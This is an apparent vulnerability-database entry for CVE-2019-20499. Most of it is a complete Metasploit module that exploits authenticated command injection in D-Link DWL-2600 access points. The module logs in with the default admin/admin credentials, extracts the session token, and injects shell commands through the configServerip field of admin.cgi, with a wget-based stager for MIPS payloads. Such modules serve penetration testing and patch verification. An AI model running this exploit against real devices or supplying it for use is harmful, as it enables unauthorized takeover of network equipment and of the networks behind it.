ID
VAR-E-202003-0030
CVE
| cve_id: | CVE-2019-20499 | Trust: 1.5 |
EDB ID
48274
TITLE
DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit) - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit). CVE-2019-20499 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | dlink | model: | dwl-2600 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | dlink | model: | dwl-2600 authenticated remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
end
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authenticated Remote Command Injection (Metasploit)
Trust: 1.6
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 48274 | Trust: 1.6 |
| db: | NVD | id: | CVE-2019-20499 | Trust: 1.5 |
| db: | EDBNET | id: | 102793 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 156952 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-20499 | Trust: 1.5 |
| url: | https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/48274/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 156952 |
| db: | EXPLOIT-DB | id: | 48274 |
| db: | EDBNET | id: | 102793 |
LAST UPDATE DATE
2022-07-27T09:51:29.653000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 156952 | date: | 2020-03-28T14:40:42 |
| db: | EXPLOIT-DB | id: | 48274 | date: | 2020-03-31T00:00:00 |
| db: | EDBNET | id: | 102793 | date: | 2020-03-31T00:00:00 |